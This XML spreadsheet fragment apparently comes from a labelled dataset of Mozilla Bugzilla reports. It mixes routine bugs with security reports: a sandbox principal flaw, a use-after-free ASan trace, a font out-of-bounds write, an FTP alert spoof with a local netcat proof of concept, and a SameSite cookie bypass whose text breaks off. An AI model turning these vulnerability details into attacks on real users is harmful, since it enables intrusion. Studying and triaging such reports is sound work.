      <c r="U5883" t="n">
        <v>0</v>
      </c>
      <c r="V5883" t="n">
        <v>21</v>
      </c>
      <c r="W5883" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
Visit the following URL: about:home?1:q
"MOZ_CRASH(Should never get here!)" is the reason.
Actual results:
Report:
https://crash-stats.mozilla.com/report/index/5bd57607-cb08-4606-b085-9755d0171202#tab-details
Expected results:
No crash. Also I will mark as sensitive since I am seeing the words "MEMORY_CORRUPTION_LARGE_80000003_memory_corruption!KERNEL32" in my windbg, though I'm not sure if it is. Also, about:home is linkable from web content, so if this was exploitable its even more dangerous as it requires no user interaction.</t>
        </is>
      </c>
      <c r="X5883" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5884">
      <c r="A5884" t="n">
        <v>1431027</v>
      </c>
      <c r="B5884" t="inlineStr">
        <is>
          <t>2018-01-17 01:40:51 -0800</t>
        </is>
      </c>
      <c r="C5884" t="inlineStr">
        <is>
          <t>Disk space warning shows incorrect preferences path</t>
        </is>
      </c>
      <c r="D5884" t="inlineStr">
        <is>
          <t>2018-02-26 14:26:07 -0800</t>
        </is>
      </c>
      <c r="E5884" t="n">
        <v>1</v>
      </c>
      <c r="F5884" t="n">
        <v>1</v>
      </c>
      <c r="G5884" t="n">
        <v>2</v>
      </c>
      <c r="H5884" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5884" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5884" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K5884" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L5884" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5884" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5884" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5884" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5884" t="inlineStr">
        <is>
          <t>[storage-v2]</t>
        </is>
      </c>
      <c r="Q5884" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5884" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5884" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T5884" t="n">
        <v>1</v>
      </c>
      <c r="U5884" t="n">
        <v>0</v>
      </c>
      <c r="V5884" t="n">
        <v>9</v>
      </c>
      <c r="W5884" t="inlineStr">
        <is>
          <t>The "storage pressure notification" (https://blog.nightly.mozilla.org/files/2017/07/storage_pressure_notification.png) still contains the old preference structure:
"You can clear stored site data in Preferences &gt; Advanced &gt; Site Data."
This should be updated. We'll probably do it as part of the storage UX improvements.
https://searchfox.org/mozilla-central/rev/48cbb200aa027a0a379b6004b6196a167344b865/browser/locales/en-US/chrome/browser/preferences/preferences.properties#217</t>
        </is>
      </c>
      <c r="X5884" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5885">
      <c r="A5885" t="n">
        <v>747607</v>
      </c>
      <c r="B5885" t="inlineStr">
        <is>
          <t>2012-04-20 22:31:34 -0700</t>
        </is>
      </c>
      <c r="C5885" t="inlineStr">
        <is>
          <t>Problem with evalInSandbox and location</t>
        </is>
      </c>
      <c r="D5885" t="inlineStr">
        <is>
          <t>2013-03-18 12:51:52 -0700</t>
        </is>
      </c>
      <c r="E5885" t="n">
        <v>1</v>
      </c>
      <c r="F5885" t="n">
        <v>1</v>
      </c>
      <c r="G5885" t="n">
        <v>3</v>
      </c>
      <c r="H5885" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5885" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5885" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5885" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5885" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5885" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5885" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5885" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5885" t="inlineStr">
        <is>
          <t>[sg:high][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q5885" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5885" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5885" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5885" t="n">
        <v>1</v>
      </c>
      <c r="U5885" t="n">
        <v>0</v>
      </c>
      <c r="V5885" t="n">
        <v>33</v>
      </c>
      <c r="W5885" t="inlineStr">
        <is>
          <t>This is related to bug 736537.  If a code executed by evalInSandbox() sets location.href, nsLocation::CheckURL() gets the wrong subject principal since GetContextFromStack() ignores a sandbox's JS context and gets a JS context on which a chrome code that calls evalInSandbox() is running.
Greasemonkey user scripts that access unsafeWindow could be affected.
- An attacker can perform an XSS attack.
- An attacker can steal a local file.</t>
        </is>
      </c>
      <c r="X5885" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5886">
      <c r="A5886" t="n">
        <v>914266</v>
      </c>
      <c r="B5886" t="inlineStr">
        <is>
          <t>2013-09-09 10:20:10 -0700</t>
        </is>
      </c>
      <c r="C5886" t="inlineStr">
        <is>
          <t>Add is_archived column to questions.</t>
        </is>
      </c>
      <c r="D5886" t="inlineStr">
        <is>
          <t>2019-01-07 09:45:13 -0800</t>
        </is>
      </c>
      <c r="E5886" t="n">
        <v>1</v>
      </c>
      <c r="F5886" t="n">
        <v>1</v>
      </c>
      <c r="G5886" t="n">
        <v>5</v>
      </c>
      <c r="H5886" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5886" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5886" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K5886" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5886" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5886" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5886" t="inlineStr">
        <is>
          <t>u=sumo-team c=questions p=3 s=2013.18</t>
        </is>
      </c>
      <c r="Q5886" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5886" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5886" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T5886" t="n">
        <v>1</v>
      </c>
      <c r="U5886" t="n">
        <v>0</v>
      </c>
      <c r="V5886" t="n">
        <v>22</v>
      </c>
      <c r="W5886" t="inlineStr">
        <is>
          <t>We currently are abusing the is_locked column for several different use cases:
* Duplicate questions
* Off topic questions or spam (sometimes they are deleted instead of locked)
* Questions older than 180 days
This last case is different than the other two. It is more like an archiving. We want the question to count for all of the metrics but we don't want them appearing in search results. The SUMO team does not want the first two cases to be counted in any of our metrics. Therefore, we need an extra state.
My proposed solution is to add a new column to questions for archiving them. This will only be applied by our cron job that expires old questions.
What needs to happen?
* Schema change. We need to add the new column to questions_question. This might take a while to run and, therefore, require DBA supervision.
* Data migration. For all questions older than 180 days, we want to set is_archived=True to all the questions that have is_locked=True and reset is_locked to False.
* Search mapping change. We want to add archived to the mapping.
* Search querying changes. We need to tweak our default search to not show archived questions (in addition to not showing locked questions).
* UI/View changes.
** We want archived questions to behave just like locked ones. That is, you can't reply to them or vote on them and whatever else we block for locked questions.
** We want to show a note about the question being archived just like we do for locked questions.
* Update/add tests.
Did I miss anything? This is quite a bit. Is it worth it? Are there other solutions?</t>
        </is>
      </c>
      <c r="X5886" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5887">
      <c r="A5887" t="n">
        <v>1362050</v>
      </c>
      <c r="B5887" t="inlineStr">
        <is>
          <t>2017-05-04 07:06:53 -0700</t>
        </is>
      </c>
      <c r="C5887" t="inlineStr">
        <is>
          <t>FTP allows window modal alert box with attacker controlled input</t>
        </is>
      </c>
      <c r="D5887" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E5887" t="n">
        <v>1</v>
      </c>
      <c r="F5887" t="n">
        <v>1</v>
      </c>
      <c r="G5887" t="n">
        <v>6</v>
      </c>
      <c r="H5887" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5887" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5887" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K5887" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5887" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5887" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5887" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5887" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5887" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main66+]</t>
        </is>
      </c>
      <c r="Q5887" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5887" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5887" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5887" t="n">
        <v>1</v>
      </c>
      <c r="U5887" t="n">
        <v>0</v>
      </c>
      <c r="V5887" t="n">
        <v>13</v>
      </c>
      <c r="W5887" t="inlineStr">
        <is>
          <t>Created attachment 8864528
ftpalert.htm
When one sends garbage over the ftp port 21 and tries to access it via firefox + then tries to reload it will create an alert box with the garbage as content.
I'm attaching a poc. Use it by first starting a dummy "garbage ftp server" on localhost with netcat:
while true; do echo "I can control your popup window content" | nc -l -p 21; done
And then open the html file.
I don't see why this behavior makes any sense. It seems some kind of error handling, however it's missing any explaining error message and just puts all content that came over the ftp port in an alert box. It allows bypassing restrictions of window modal alert boxes, which usually webpages shouldn't be able to control.</t>
        </is>
      </c>
      <c r="X5887" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5888">
      <c r="A5888" t="n">
        <v>802902</v>
      </c>
      <c r="B5888" t="inlineStr">
        <is>
          <t>2012-10-17 17:53:02 -0700</t>
        </is>
      </c>
      <c r="C5888" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsViewManager::ProcessPendingUpdates</t>
        </is>
      </c>
      <c r="D5888" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:11 -0700</t>
        </is>
      </c>
      <c r="E5888" t="n">
        <v>1</v>
      </c>
      <c r="F5888" t="n">
        <v>1</v>
      </c>
      <c r="G5888" t="n">
        <v>3</v>
      </c>
      <c r="H5888" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5888" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5888" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5888" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5888" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5888" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5888" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5888" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5888" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q5888" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5888" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5888" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5888" t="n">
        <v>1</v>
      </c>
      <c r="U5888" t="n">
        <v>0</v>
      </c>
      <c r="V5888" t="n">
        <v>16</v>
      </c>
      <c r="W5888" t="inlineStr">
        <is>
          <t>Created attachment 672617
Testcase
Reproduces on trunk.
=================================================================
==12412== ERROR: AddressSanitizer heap-use-after-free on address 0x7fdd01d75fa8 at pc 0x7fdd18f484cc bp 0x7fffb2f66e10 sp 0x7fffb2f66e08
READ of size 8 at 0x7fdd01d75fa8 thread T0
    #0 0x7fdd18f484cb in nsViewManager::ProcessPendingUpdates() view/src/nsViewManager.cpp:1212
    #1 0x7fdd1ae3e36b in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:475
    #2 0x7fdd1ae3e9d6 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:555
    #3 0x7fdd1ad6baf3 in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:220
    #4 0x7fdd1a92b6b0 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #5 0x7fdd1aec3bdb in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:215
    #6 0x7fdd1a624ebd in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #7 0x7fdd17891a44 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3858
    #8 0x7fdd17892b1a in XRE_main toolkit/xre/nsAppRunner.cpp:3933
    #9 0x408d75 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #10 0x7fdd219e876c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
0x7fdd01d75fa8 is located 40 bytes inside of 64-byte region [0x7fdd01d75f80,0x7fdd01d75fc0)
freed by thread T0 here:
    #0 0x432e00 in free 
    #1 0x7fdd18f3ebac in nsViewManager::Release() view/src/nsViewManager.cpp:125
    #2 0x7fdd19eaf9d8 in nsDocShell::Destroy() docshell/base/nsDocShell.cpp:4897
    #3 0x7fdd19eaff5c in non-virtual thunk to nsDocShell::Destroy() :0
    #4 0x7fdd1a06e13d in nsWebShellWindow::Destroy() xpfe/appshell/src/nsWebShellWindow.cpp:750
    #5 0x7fdd18ff4fec in nsGlobalWindow::ReallyCloseWindow() dom/base/nsGlobalWindow.cpp:6734
    #6 0x7fdd18ff433f in nsGlobalWindow::FinalClose() dom/base/nsGlobalWindow.cpp:6681
    #7 0x7fdd18ff3ca2 in nsGlobalWindow::Close() dom/base/nsGlobalWindow.cpp:6624
    #8 0x7fdd18ff3811 in nsGlobalWindow::Close() dom/base/nsGlobalWindow.cpp:6559
    #9 0x7fdd1ae734a9 in NS_InvokeByIndex_P xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #10 0x7fdd19bee7c9 in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:3108
    #11 0x7fdd19c02dc8 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1488
    #12 0x7fdd1c0e3148 in JSFunction::native() const js/src/jscntxtinlines.h:364
    #13 0x7fdd1c0e40b7 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) js/src/jsinterp.h:109
    #14 0x7fdd1c1c8527 in js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) js/src/jsproxy.cpp:450
    #15 0x7fdd1c32730d in js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) js/src/jswrapper.cpp:390
    #16 0x7fdd1c327639 in non-virtual thunk to js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) 
    #17 0x7fdd1c0e3289 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:364
    #18 0x7fdd1c0d30d9 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2370
    #19 0x7fdd1c0bdf33 in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #20 0x7fdd1c0e3038 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:378
    #21 0x7fdd1c040be0 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) js/src/jsinterp.h:109
    #22 0x7fdd1c0e3148 in JSFunction::native() const js/src/jscntxtinlines.h:364
    #23 0x7fdd1c0d30d9 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2370
    #24 0x7fdd1c0bdf33 in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #25 0x7fdd1c0e3038 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:378
    #26 0x7fdd1c0e40b7 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) js/src/jsinterp.h:109
    #27 0x7fdd1c1c8527 in js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) js/src/jsproxy.cpp:450
    #28 0x7fdd1c32730d in js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) js/src/jswrapper.cpp:390
    #29 0x7fdd1c327639 in non-virtual thunk to js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) 
previously allocated by thread T0 here:
    #0 0x432ec0 in __interceptor_malloc 
    #1 0x7fdd1ee8d228 in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
Shadow byte and word:
  0x1ffba03aebf5: fd
  0x1ffba03aebf0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffba03aebd0: 00 00 00 01 fb fb fb fb
  0x1ffba03aebd8: fb fb fb fb fb fb fb fb
  0x1ffba03aebe0: fa fa fa fa fa fa fa fa
  0x1ffba03aebe8: fa fa fa fa fa fa fa fa
=&gt;0x1ffba03aebf0: fd fd fd fd fd fd fd fd
  0x1ffba03aebf8: fd fd fd fd fd fd fd fd
  0x1ffba03aec00: fa fa fa fa fa fa fa fa
  0x1ffba03aec08: fa fa fa fa fa fa fa fa
  0x1ffba03aec10: fd fd fd fd fd fd fd fd
Stats: 289M malloced (302M for red zones) by 407162 calls
Stats: 35M realloced by 20307 calls
Stats: 252M freed by 260279 calls
Stats: 121M really freed by 107074 calls
Stats: 500M (128096 full pages) mmaped in 125 calls
  mmaps   by size class: 8:262128; 9:32764; 10:12285; 11:12282; 12:3072; 13:2048; 14:1280; 15:256; 16:576; 17:1280; 18:288; 19:40; 20:32; 21:4;
  mallocs by size class: 8:326930; 9:43810; 10:12490; 11:13674; 12:3072; 13:2374; 14:1671; 15:339; 16:815; 17:1616; 18:297; 19:40; 20:31; 21:3;
  frees   by size class: 8:201346; 9:31687; 10:7929; 11:10578; 12:2184; 13:2179; 14:1470; 15:284; 16:725; 17:1600; 18:228; 19:39; 20:27; 21:3;
  rfrees  by size class: 8:79435; 9:13591; 10:2500; 11:7030; 12:870; 13:866; 14:1033; 15:156; 16:460; 17:1116; 18:11; 19:5; 20:1;
Stats: malloc large: 1987 small slow: 2137</t>
        </is>
      </c>
      <c r="X5888" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5889">
      <c r="A5889" t="n">
        <v>1381138</v>
      </c>
      <c r="B5889" t="inlineStr">
        <is>
          <t>2017-07-14 14:20:48 -0700</t>
        </is>
      </c>
      <c r="C5889" t="inlineStr">
        <is>
          <t>browser_urlbarSearchSuggestions_opt-out.js is going to permafail when Gecko 56 merges to Beta</t>
        </is>
      </c>
      <c r="D5889" t="inlineStr">
        <is>
          <t>2017-08-02 01:10:53 -0700</t>
        </is>
      </c>
      <c r="E5889" t="n">
        <v>1</v>
      </c>
      <c r="F5889" t="n">
        <v>1</v>
      </c>
      <c r="G5889" t="n">
        <v>2</v>
      </c>
      <c r="H5889" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5889" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5889" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5889" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5889" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5889" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5889" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5889" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5889" t="inlineStr">
        <is>
          <t>[fxsearch][fixed by bug 1365133]</t>
        </is>
      </c>
      <c r="Q5889" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5889" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5889" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5889" t="n">
        <v>1</v>
      </c>
      <c r="U5889" t="n">
        <v>0</v>
      </c>
      <c r="V5889" t="n">
        <v>10</v>
      </c>
      <c r="W5889" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Test permafail when Gecko 56 merges to Beta in a few weeks.
Affects all platforms.
https://treeherder.mozilla.org/logviewer.html#?job_id=113641439&amp;repo=try&amp;lineNumber=2613
INFO - TEST-START | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js
INFO - TEST-INFO | started process screentopng
INFO - TEST-INFO | screentopng: exit 0
INFO - Buffered messages logged at 12:53:38
INFO - Entering test bound prepare
INFO - Waiting for engine to be added: searchSuggestionEngine.xml
INFO - Search engine added: searchSuggestionEngine.xml
INFO - Leaving test bound prepare
INFO - Entering test bound focus
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | popup should be open - true == true - 
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | "-moz-deck" != "none" - 
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | "collapse" == "collapse" - 
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | popup should have no results - 0 == 0 - 
INFO - Buffered messages logged at 12:53:39
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | true == true - 
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | "-moz-deck" != "none" - 
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | "visible" == "visible" - 
INFO - Buffered messages finished
INFO - TEST-UNEXPECTED-FAIL | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | Test timed out - 
INFO - TEST-PASS | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | popup should be closed - true == true - 
INFO - GECKO(1692) | MEMORY STAT | vsize 2270MB | residentFast 300MB | heapAllocated 138MB
INFO - TEST-OK | browser/base/content/test/urlbar/browser_urlbarSearchSuggestions_opt-out.js | took 45264ms
Screenshot:
https://public-artifacts.taskcluster.net/fhULmz6ETGOmKJ07kMQHSg/0/public/test_info//mozilla-test-fail-screenshot_sZF5Mf.png</t>
        </is>
      </c>
      <c r="X5889" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5890">
      <c r="A5890" t="n">
        <v>1242322</v>
      </c>
      <c r="B5890" t="inlineStr">
        <is>
          <t>2016-01-24 20:52:59 -0800</t>
        </is>
      </c>
      <c r="C5890" t="inlineStr">
        <is>
          <t>Crash - Out of Bounds Write in Graphite setAttr Function</t>
        </is>
      </c>
      <c r="D5890" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:37 -0700</t>
        </is>
      </c>
      <c r="E5890" t="n">
        <v>1</v>
      </c>
      <c r="F5890" t="n">
        <v>1</v>
      </c>
      <c r="G5890" t="n">
        <v>3</v>
      </c>
      <c r="H5890" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5890" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5890" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5890" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L5890" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5890" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5890" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5890" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5890" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-ESR38.6+] fixed in 1243843, on ESR in bug 1246093</t>
        </is>
      </c>
      <c r="Q5890" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5890" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5890" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5890" t="n">
        <v>1</v>
      </c>
      <c r="U5890" t="n">
        <v>0</v>
      </c>
      <c r="V5890" t="n">
        <v>23</v>
      </c>
      <c r="W5890" t="inlineStr">
        <is>
          <t>Created attachment 8711539
asan_stack_trace.txt
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20160106234723
Steps to reproduce:
Loaded a page that used a malicious/corrupt Graphite font file.
The ASAN build of firefox 46.0a1, downloaded from https://ftp.mozilla.org/pub/firefox/tinderbox-builds/mozilla-central-linux64-asan/1453669987/ was used.
Actual results:
The tab crashed with ASAN reporting an out of bounds write on the heap.
See the attached stack trace.
Expected results:
No crash.</t>
        </is>
      </c>
      <c r="X5890" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5891">
      <c r="A5891" t="n">
        <v>1873223</v>
      </c>
      <c r="B5891" t="inlineStr">
        <is>
          <t>2024-01-05 07:43:33 -0800</t>
        </is>
      </c>
      <c r="C5891" t="inlineStr">
        <is>
          <t>FireFox Same Site "Strict" Cookie Bypass via firefox/firefox-private protocol/schemes registered with the OS and using an external browser</t>
        </is>
      </c>
      <c r="D5891" t="inlineStr">
        <is>
          <t>2024-09-16 00:17:18 -0700</t>
        </is>
      </c>
      <c r="E5891" t="n">
        <v>1</v>
      </c>
      <c r="F5891" t="n">
        <v>1</v>
      </c>
      <c r="G5891" t="n">
        <v>2</v>
      </c>
      <c r="H5891" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5891" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5891" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K5891" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5891" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M5891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5891" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5891" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5891" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main123+]</t>
        </is>
      </c>
      <c r="Q5891" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5891" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5891" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T5891" t="n">
        <v>1</v>
      </c>
      <c r="U5891" t="n">
        <v>0</v>
      </c>
      <c r="V5891" t="n">
        <v>22</v>
      </c>
      <c r="W5891" t="inlineStr">
        <is>
          <t>Dear Team,
Here are the vulnerability details.
Description
SameSite is an attribute that can be set for cookies in web browsers. It is used to control how cookies are sent with cross-site requests. The SameSite attribute helps mitigate the risk of cross-site request forgery (CSRF) attacks and protects user privacy.
There are three possible values for the SameSite attribute:
1. Strict: When a cookie has the `SameSite=Strict` attribute, it will only be sent in a first-party context. This means that the cookie will only be sent if the request originates from the same site as the one that set the cookie.
    Example:
    ```plaintext
    Set-Cookie: mycookie=myvalue; SameSite=Strict;
    ```
2. Lax:With `SameSite=Lax`, cookies are allowed to be sent with top-level navigations and safe HTTP methods (like GET), but they will not be sent when the request is initiated by a third-party website through methods such as a cross-origin POST request.
    Example:
    ```plaintext
    Set-Cookie: mycookie=myvalue; SameSite=Lax;
    ```
3. None: Setting `SameSite=None` allows cookies to be sent with both first-party and third-party requests. This is often used for scenarios where the cookie needs to be sent across different domains, such as when embedding content from one site into another.
    Example:
    ```plaintext
